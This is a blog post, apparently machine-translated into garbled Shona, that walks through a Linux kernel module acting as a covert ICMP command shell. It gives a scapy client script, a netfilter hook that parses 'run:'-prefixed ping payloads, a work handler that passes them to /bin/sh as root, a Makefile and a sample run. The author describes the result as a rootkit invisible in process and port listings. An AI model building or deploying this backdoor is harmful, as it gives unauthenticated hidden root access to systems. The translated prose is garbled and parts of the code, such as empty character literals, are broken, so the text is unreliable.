TL; DR: Ndiri kunyora kernel module inozoverenga mirairo kubva kuICMP payload uye woiisa pane server kunyangwe SSH yako ikaparara. Kune avo vasingashiviriri, kodhi yese ndeye .
Kuchenjerera Vagadziri vezvirongwa zveC vane ruzivo rwokuzviwanira vari mungozi yokuyerera misodzi yeropa! Ndinogona kunge ndakakanganisa muchirevo chemashoko, asi chero kutsoropodza kunogamuchirwa. Iyo posvo inoitirwa avo vane pfungwa yakaoma kwazvo yeC programming uye vanoda kutarisa mukati meLinux.
Mune macomments kune yangu yekutanga yakataura SoftEther VPN, iyo inogona kutevedzera mamwe "enguva dzose" mapuroteni, kunyanya HTTPS, ICMP uye kunyange DNS. Ndinogona kufungidzira chete yekutanga yavo ichishanda, sezvo ini ndichinyatsoziva HTTP (S), uye ndaifanira kudzidza tunnel pamusoro peICMP neDNS.
Ehe, muna 2020 ndakadzidza kuti iwe unogona kuisa mubhadharo usingabhadhari mumapaketi eICMP. Asi zviri nani kunonoka kupfuura kusamboita! Uye sezvo chimwe chinhu chinogona kuitwa pamusoro pazvo, saka chinofanira kuitwa. Sezvo muhupenyu hwangu hwezuva nezuva ini ndinowanzo shandisa mutsara wekuraira, kusanganisira kuburikidza neSSH, iyo pfungwa yeICMP goko yakauya mupfungwa dzangu kutanga. Uye kuti ndiunganidze yakazara bullshield bhingo, ndakafunga kuinyora seLinux module mumutauro wandinongove nepfungwa yakaoma. Goko rakadaro harizoonekwe mune rondedzero yemaitiro, unogona kuiisa mu kernel uye haizove pane iyo faira system, iwe hauone chero chinhu chinofungidzirwa murunyorwa rwekuteerera ports. Panyaya yekugona kwayo, iyi izere-yakazara rootkit, asi ini ndinotarisira kuivandudza uye kuishandisa segoko rekupedzisira sarudzo apo Mutoro Wepakati wakanyanya kukwirira kupinda kuburikidza neSSH uye kuita zvishoma. echo i > /proc/sysrq-triggerkudzoreredza kupinda pasina kutangazve.
Isu tinotora mameseji edhita, hunyanzvi hwekugadzirisa hunyanzvi muPython neC, Google uye izvo zvausinganetse kuisa pasi pebanga kana zvese zvikaputsika (sarudzo - yemuno VirtualBox/KVM/etc) uye ngatiendei!
Client side
Zvaiita kwandiri kuti kune chikamu chemutengi ndaizofanira kunyora script ine mitsara ye80, asi pakanga paine vanhu vane mutsa vakandiitira. . Iyo kodhi yakave nyore isingatarisirwe, inokodzera mumitsetse gumi yakakosha:
import sys
from scapy.all import sr1, IP, ICMP
if len(sys.argv) < 3:
print('Usage: {} IP "command"'.format(sys.argv[0]))
exit(0)
p = sr1(IP(dst=sys.argv[1])/ICMP()/"run:{}".format(sys.argv[2]))
if p:
p.show()
Iyo script inotora nharo mbiri, kero uye mubhadharo. Usati watumira, kubhadhara kunotungamirirwa nekiyi run:, isu tichazvida kuti tisabatanidze mapakeji ane zvakajairwa payloads.
Iyo kernel inoda maropafadzo ekugadzira mapakeji, saka script ichafanirwa kumhanyiswa sesuperuser. Usakanganwa kupa mvumo yekuuraya uye kuisa scapy pachayo. Debian ine package inonzi python3-scapy. Iye zvino unogona kutarisa kuti zvese zvinoshanda sei.
Kumhanya uye kubudisa murairo
morq@laptop:~/icmpshell$ sudo ./send.py 45.11.26.232 "Hello, world!"
Begin emission:
.Finished sending 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 45
id = 17218
flags =
frag = 0
ttl = 58
proto = icmp
chksum = 0x3403
src = 45.11.26.232
dst = 192.168.0.240
options
###[ ICMP ]###
type = echo-reply
code = 0
chksum = 0xde03
id = 0x0
seq = 0x0
###[ Raw ]###
load = 'run:Hello, world!
Izvi ndizvo zvinoratidzika mumunhu anofembedza
morq@laptop:~/icmpshell$ sudo tshark -i wlp1s0 -O icmp -f "icmp and host 45.11.26.232"
Running as user "root" and group "root". This could be dangerous.
Capturing on 'wlp1s0'
Frame 1: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 192.168.0.240, Dst: 45.11.26.232
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0xd603 [correct]
[Checksum Status: Good]
Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
Data (17 bytes)
0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]
Frame 2: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 45.11.26.232, Dst: 192.168.0.240
Internet Control Message Protocol
Type: 0 (Echo (ping) reply)
Code: 0
Checksum: 0xde03 [correct]
[Checksum Status: Good]
Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
[Request frame: 1]
[Response time: 19.094 ms]
Data (17 bytes)
0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]
^C2 packets captured
Mubhadharo mubhadharo wemhinduro hauchinji.
Kernel module
Kuvaka muDebian virtual muchina iwe unozoda kanenge make ΠΈ linux-headers-amd64, mamwe achauya ari muchimiro chekutsamira. Ini handisi kuzopa iyo kodhi yese muchinyorwa; unogona kuigadzira paGithub.
Hook setup
Kutanga, tinoda mabasa maviri kuitira kurodha module uye kuiburitsa. Basa rekuburitsa haridiwe, asi ipapo rmmod hazvishande; module inongoburitswa kana yakadzimwa.
#include <linux/module.h>
#include <linux/netfilter_ipv4.h>
static struct nf_hook_ops nfho;
static int __init startup(void)
{
nfho.hook = icmp_cmd_executor;
nfho.hooknum = NF_INET_PRE_ROUTING;
nfho.pf = PF_INET;
nfho.priority = NF_IP_PRI_FIRST;
nf_register_net_hook(&init_net, &nfho);
return 0;
}
static void __exit cleanup(void)
{
nf_unregister_net_hook(&init_net, &nfho);
}
MODULE_LICENSE("GPL");
module_init(startup);
module_exit(cleanup);Chii chiri kuitika pano:
- Mafaira maviri emusoro anodhonzwa mukati kuti ashandise iyo module pachayo uye netfilter.
- Mabasa ese anopinda netfilter, unogona kuseta machira mairi. Kuti uite izvi, unofanirwa kuzivisa chimiro umo hoko ichagadziriswa. Chinonyanya kukosha ndechekutsanangura basa richaitwa sehokwe:
nfho.hook = icmp_cmd_executor;Ndichasvika kubasa pacharo.
Ipapo ini ndinoseta iyo nguva yekugadzirisa yepakeji:NF_INET_PRE_ROUTINGinotsanangura kugadzirisa pasuru kana yatanga kuoneka mu kernel. Inogona kushandiswaNF_INET_POST_ROUTINGkugadzirisa packet painobuda mu kernel.
Ndakaisa sefa ku IPv4:nfho.pf = PF_INET;.
Ini ndinopa hoko yangu iyo inonyanya kukosha:nfho.priority = NF_IP_PRI_FIRST;
Uye ini ndinonyoresa iyo data chimiro sehoko chaiyo:nf_register_net_hook(&init_net, &nfho); - Basa rekupedzisira rinobvisa hoko.
- Rezinesi inonyatso kuratidzwa kuitira kuti compiler asanyunyute.
- Mabasa
module_init()ΠΈmodule_exit()seta mamwe mabasa ekutanga uye kumisa module.
Kudzosa payload
Zvino isu tinoda kubvisa mubhadharo, iro rakazova iro basa rakaoma kwazvo. Iyo kernel haina akavakirwa-mukati mabasa ekushanda nemapayloads; iwe unogona chete kupatsanura misoro yepamusoro-level protocol.
#include <linux/ip.h>
#include <linux/icmp.h>
#define MAX_CMD_LEN 1976
char cmd_string[MAX_CMD_LEN];
struct work_struct my_work;
DECLARE_WORK(my_work, work_handler);
static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
struct iphdr *iph;
struct icmphdr *icmph;
unsigned char *user_data;
unsigned char *tail;
unsigned char *i;
int j = 0;
iph = ip_hdr(skb);
icmph = icmp_hdr(skb);
if (iph->protocol != IPPROTO_ICMP) {
return NF_ACCEPT;
}
if (icmph->type != ICMP_ECHO) {
return NF_ACCEPT;
}
user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
tail = skb_tail_pointer(skb);
j = 0;
for (i = user_data; i != tail; ++i) {
char c = *(char *)i;
cmd_string[j] = c;
j++;
if (c == '')
break;
if (j == MAX_CMD_LEN) {
cmd_string[j] = '';
break;
}
}
if (strncmp(cmd_string, "run:", 4) != 0) {
return NF_ACCEPT;
} else {
for (j = 0; j <= sizeof(cmd_string)/sizeof(cmd_string[0])-4; j++) {
cmd_string[j] = cmd_string[j+4];
if (cmd_string[j] == '')
break;
}
}
schedule_work(&my_work);
return NF_ACCEPT;
}Chii chiri kuitika:
- Ini ndaifanira kusanganisira mamwe mafaera emusoro, panguva ino kushandura IP uye ICMP misoro.
- Ndinoseta hurefu hwemutsara:
#define MAX_CMD_LEN 1976. Sei chaizvo izvi? Nekuti mugadziri anonyunyuta nezvazvo! Ivo vakatondikurudzira kuti ndinofanira kunzwisisa stack uye murwi, rimwe zuva ndichanyatsoita izvi uye pamwe kururamisa kodhi. Ndakabva ndaseta mutsara uchange uine rairo:char cmd_string[MAX_CMD_LEN];. Inofanirwa kuoneka mumabasa ese; Ini ndichataura nezve izvi zvakadzama mundima 9. - Iye zvino tinofanira kutanga (
struct work_struct my_work;) kuronga uye kuibatanidza nerimwe basa (DECLARE_WORK(my_work, work_handler);) Ini ndichataurawo nezvekuti nei izvi zvichidikanwa mundima yepfumbamwe. - Zvino ini ndinozivisa basa, iro richava hoko. Mhando uye nharo dzakagamuchirwa dzinorairwa netfilter, isu tinongofarira
skb. Iyi socket buffer, yakakosha data chimiro chine ruzivo rwese rwuripo nezve packet. - Kuti basa rishande, iwe uchada zvimiro zviviri uye akati wandei akasiyana, kusanganisira maviri iterators.
struct iphdr *iph; struct icmphdr *icmph; unsigned char *user_data; unsigned char *tail; unsigned char *i; int j = 0; - Tinogona kutanga nepfungwa. Kuti module ishande, hapana mapaketi kunze kweICMP Echo anodiwa, saka isu tinoparura buffer tichishandisa akavakirwa-mukati mabasa uye kukanda kunze ese asiri-ICMP uye asiri Echo mapaketi. Dzoka
NF_ACCEPTzvinoreva kugamuchirwa kwepakeji, asi iwe unogona zvakare kudonhedza mapakeji nekudzokaNF_DROP.iph = ip_hdr(skb); icmph = icmp_hdr(skb); if (iph->protocol != IPPROTO_ICMP) { return NF_ACCEPT; } if (icmph->type != ICMP_ECHO) { return NF_ACCEPT; }Ini handina kuyedza zvichaitika ndisina kutarisa iyo IP misoro. Ruzivo rwangu rushoma rweC runondiudza kuti pasina mamwe macheki, chimwe chinhu chinotyisa chichaitika. Ndichafara kana mukandirambidza izvi!
- Iye zvino sezvo pasuru yacho iri yemhando chaiyo yaunoda, unogona kubvisa iyo data. Pasina yakavakirwa-mukati basa, iwe unofanirwa kutanga watora chinongedzo kune kutanga kwemubhadharo. Izvi zvinoitwa munzvimbo imwechete, iwe unofanirwa kutora chinongedzo kusvika pakutanga kweiyo ICMP musoro uye woifambisa kune saizi yemusoro uyu. Zvose zvinoshandisa chimiro
icmph:user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
Kupera kwemusoro kunofanirwa kuenderana nekupera kwemubhadharo mukatiskb, saka tinoiwana tichishandisa nyukireya nzira kubva kune inoenderana chimiro:tail = skb_tail_pointer(skb);.
Mufananidzo wacho wakabiwa , unogona kuverenga zvakawanda nezve socket buffer. - Paunenge uchinge uine anongedza pakutanga uye kumagumo, unogona kukopa iyo data mutambo
cmd_string, tarisa kuti uone kuvapo kwechivakashurerun:uye, kana kurasa pasuru kana isipo, kana kunyorazve mutsetse, uchibvisa chivakashure ichi. - Ndizvozvo, ikozvino unogona kufonera mumwe mubati:
schedule_work(&my_work);. Sezvo zvisingazogone kupfuudza parameter kune kufona kwakadaro, mutsara une murairo unofanirwa kuve wepasirese.schedule_work()ichaisa basa rakabatana neyakapfuura chimiro mumutsara wakazara wemugadziri webasa uye apedze, zvichikutendera kuti usamirire kuti murairo upedze. Izvi zvinodikanwa nekuti chirauro chinofanira kunge chiri kukurumidza kwazvo. Zvikasadaro, sarudzo yako ndeyekuti hapana chinotanga kana iwe uchawana kernel panic. Kunonoka kwakafanana nerufu! - Ndizvozvo, iwe unogona kugamuchira pasuru ine inowirirana kudzoka.
Kufonera chirongwa munzvimbo yemushandisi
Basa iri ndiro rinonzwisisika. Zita rayo rakapiwa mukati DECLARE_WORK(), mhando uye nharo dzinogamuchirwa hadzinakidzi. Isu tinotora mutsara nemurairo uye tinoupfuudza zvachose kune shell. Ngaaite nekupaza, kutsvaga mabhinari nezvimwe zvese.
static void work_handler(struct work_struct * work)
{
static char *argv[] = {"/bin/sh", "-c", cmd_string, NULL};
static char *envp[] = {"PATH=/bin:/sbin", NULL};
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}- Isai nharo kune mutsara wetambo
argv[]. Ini ndichafungidzira kuti munhu wese anoziva kuti zvirongwa zvinonyatsoitwa nenzira iyi, uye kwete semutsara unoenderera une nzvimbo. - Seta mamiriro akasiyana. Ini ndakaisa chete PATH ine shoma seti yemakwara, ndichitarisira kuti ese akange atosanganiswa
/binΡ/usr/binΠΈ/sbinΡ/usr/sbin. Dzimwe nzira hadzina basa mukuita. - Zvaita, ngatizviite! Kernel basa
call_usermodehelper()inobvuma kupinda. nzira inoenda kubhinari, nhevedzano yenharo, mutsara wezvakatipoteredza zvakasiyana. Pano ini zvakare ndinofungidzira kuti munhu wese anonzwisisa zvinoreva kupfuudza nzira kune faira rinogoneka segakava rakasiyana, asi unogona kubvunza. Nharo yekupedzisira inotsanangura kana kumirira kuti maitiro apedze (UMH_WAIT_PROC), process inotanga (UMH_WAIT_EXEC) kana kusamirira zvachose (UMH_NO_WAIT) Pane zvimweUMH_KILLABLE, handina kuzvitarisa.
Gungano
Iko kuungana kwema kernel modules kunoitwa kuburikidza nekernel make-framework. Kudanwa make mukati meiyo yakakosha dhairekitori yakasungirirwa kune kernel vhezheni (inotsanangurwa pano: KERNELDIR:=/lib/modules/$(shell uname -r)/build), uye nzvimbo yemodule inopfuudzwa kune inoshanduka M mumakakatanwa. Iyo icmpshell.ko uye dzakachena zvinangwa zvinoshandisa iyi chimiro zvachose. IN obj-m inoratidza chinhu faira chinozoshandurwa kuita module. Syntax inodzokorora main.o Π² icmpshell.o (icmpshell-objs = main.o) hazviratidzike zvine musoro kwandiri, asi ngazvive zvakadaro.
KERNELDIR:=/lib/modules/$(shell uname -r)/build
obj-m = icmpshell.o
icmpshell-objs = main.o
all: icmpshell.ko
icmpshell.ko: main.c
make -C $(KERNELDIR) M=$(PWD) modules
clean:
make -C $(KERNELDIR) M=$(PWD) clean
Tinounganidza: make. Loading: insmod icmpshell.ko. Wapedza, unogona kutarisa: sudo ./send.py 45.11.26.232 "date > /tmp/test". Kana uine faira pamushini wako /tmp/test uye ine zuva rakatumirwa chikumbiro, zvinoreva kuti wakaita zvese nemazvo uye ndakaita zvese nemazvo.
mhedziso
Chiitiko changu chekutanga chekugadzira nyukireya chakanga chiri nyore kupfuura zvandaitarisira. Kunyangwe ndisina ruzivo rwekukudziridza muC, ndichitarisa kune anounganidza mazano uye Google mhedzisiro, ndakakwanisa kunyora inoshanda module uye ndinonzwa senge kernel hacker, uye panguva imwe chete script kiddie. Pamusoro pezvo, ndakaenda kuchiteshi cheKernel Newbies, kwandakanzi ndishandise schedule_work() pane kufona call_usermodehelper() mukati mehoko yacho pachayo ndokumunyadzisa, achifungira chitsotsi. Mitsara zana yekodhi inondidyira ingangoita vhiki yebudiriro munguva yangu yemahara. Chiitiko chakabudirira chakaparadza ngano yangu pachedu pamusoro pekuoma kukuru kwekusimudzira system.
Kana mumwe munhu akabvuma kuita ongororo yekodhi paGithub, ndichatenda. Ndine chokwadi chekuti ndakaita zvikanganiso zvakapusa, kunyanya pakushanda netambo.
Source: www.habr.com